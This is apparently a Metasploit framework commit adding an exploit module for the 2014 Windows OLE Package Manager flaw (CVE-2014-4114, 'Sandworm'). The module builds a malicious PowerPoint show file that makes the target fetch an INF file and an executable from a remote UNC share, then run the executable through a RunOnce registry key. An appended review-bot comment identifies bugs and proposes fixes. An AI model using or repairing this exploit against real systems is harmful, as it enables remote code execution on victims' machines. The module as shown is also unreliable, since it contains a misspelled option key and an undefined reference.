Add sandworm module

bug/bundler_fix
jvazquez-r7 2014-10-16 16:37:37 -05:00
parent 0941b98596
commit e40642799e
1 changed files with 213 additions and 0 deletions


@ -0,0 +1,213 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "MS14-060 Microsoft Windows OLE Package Manager Code Execution",
'Description' => %q{
This module exploits a vulnerability Microsoft Windows from Vista SP2 to Windows 8,
including Windows Server 2008 and 2012. The vulnerability exists in the OLE package
magager, which allows to download and execute remote INF files silently. This module
triggers the vulnerability through a malicious PPSX file, as exploited in the wild on
October 2014.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Eduardo Prado', # Vulnerability discovery
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2014-4114'],
['OSVDB', '113140'],
['MSB', 'MS14-060'],
['BID', '70419'],
['URL' , 'http://www.isightpartners.com/2014/10/cve-2014-4114/'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/'],
['URL', 'http://blog.vulnhunt.com/index.php/2014/10/14/cve-2014-4114_sandworm-apt-windows-ole-package-inf-arbitrary-code-execution/']
],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
['Windows 7 SP1 / Office 2010 SP1', {}],
],
'Privileged' => false,
'DisclosureDate' => "Oct 14 2014",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']),
OptString.new('UNCPATH', [ true, 'The UNC path to use (Ex: \\\\192.168.1.1\\share)', '\\\\172.16.158.1\\public' ])
], self.class)
end
def exploit
@unc = validate_unc
if @unc.nil?
fail_with(Failure::BadConfig, "UNCPATH must be a remote shared folder")
end
print_status("Creating the EXE payload...")
payload_name = "#{rand_text_alpha(4)}.gif"
p = generate_payload_exe
print_status("Creating the INF file...")
inf_name = "#{rand_text_alpha(4)}.inf"
inf = inf_file(payload_name)
print_status("Creating '#{datastore['FILENAME']}' file ...")
exe_stream = ole_exe(payload_name)
inf_stream = ole_inf(inf_name)
zip = zip_ppsx(exe_stream, inf_stream)
file_create(zip)
payload_path = my_file_create(p, payload_name)
print_good("#{payload_name} stored at #{payload_path}, copy it to the remote share: #{@unc}")
inf_path = my_file_create(inf, inf_name)
print_good("#{inf_name} stored at #{inf_path}, copy it to the remote share: #{@unc}")
end
def validate_unc
if datastore['UNCPATH'] =~ /\\\\([^\\]+)\\([^\\]+)/
unc = datastore['UNPATH']
else
unc = nil
end
unc
end
def my_file_create(data, name)
ltype = "exploit.fileformat.#{self.shortname}"
path = store_local(ltype, nil, data, name)
path
end
def zip_ppsx(ole_exe, ole_inf)
zip_data = {}
data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template')
Dir["#{data_dir}/**/**"].each do |file|
unless File.directory?(file)
zip_data[file.sub(data_dir,'')] = File.read(file)
end
end
#add the otherwise skipped "hidden" file
file = "#{data_dir}/_rels/.rels"
zip_data[file.sub(data_dir,'')] = File.read(file)
#put our own OLE streams
zip_data['/ppt/embeddings/oleObject1.bin'] = ole_exe
zip_data['/ppt/embeddings/oleObject2.bin'] = ole_inf
#and lets create the file
ppsx = Rex::Zip::Archive.new
zip_data.each_pair do |k,v|
ppsx.add_file(k,v)
end
ppsx.pack
end
def ole_inf(file_name)
content = "EmbeddedStg2.txt\x00"
content << "#{@unc}\\#{file_name}\x00"
data = [content.length].pack('V')
data << content
ole = create_ole("\x01OLE10Native", data)
ole
end
def ole_exe(file_name)
content = "EmbeddedStg1.txt\x00"
content << "#{@unc}\\#{file_name}\x00"
data = [content.length].pack('V')
data << content
ole = create_ole("\x01OLE10Native", data)
ole
end
def create_ole(stream_name, data)
ole_tmp = Rex::Quickfile.new('ole')
stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)
stm = stg.create_stream(stream_name)
stm << data
stm.close
directory.each_entry do |entry|
if entry.instance_variable_get(:@_ab) == 'Root Entry'
# 02260200-0000-0000-c000-000000000046 # Video clip
clsid = Rex::OLE::CLSID.new("\x02\x26\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
entry.instance_variable_set(:@_clsId, clsid)
end
end
# write to disk
stg.close
ole_contents = File.read(ole_tmp.path)
ole_tmp.close
ole_tmp.unlink
ole_contents
end
def inf_file(gif_name)
inf = <<-EOF
; 61883.INF
; Copyright (c) Microsoft Corporation. All rights reserved.
[Version]
Signature = "$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
Provider=%Msft%
DriverVer=06/21/2006,6.1.7600.16385
[DestinationDirs]
DefaultDestDir = 1
[DefaultInstall]
RenFiles = RxRename
AddReg = RxStart
[RxRename]
#{gif_name}.exe, #{gif_name}
[RxStart]#
HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\#{gif_name}.exe
EOF
inf
end
end
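Review bot: `validate_unc` matches the regex against `datastore['UNCPATH']` but then assigns `unc = datastore['UNPATH']`, so it returns nil for every input and `exploit` always stops at the `Failure::BadConfig` check; the assignment should be `unc = datastore['UNCPATH']`. In `create_ole`, `directory.each_entry` refers to a name the module never defines and appears to be a dropped receiver for the storage object just created, `stg.directory.each_entry do |entry|`; as written it would raise NameError before the Root Entry CLSID is patched. The INF section header `[RxStart]#` carries a trailing `#` that the other headers lack; if it is not intentional it may affect how the section name is parsed and should read `[RxStart]`. The UNC regex in `validate_unc` is unanchored and never checks that the host is remote, so the "must be a remote shared folder" message claims more than the check verifies; anchoring with `\A` would at least reject paths with a leading junk prefix.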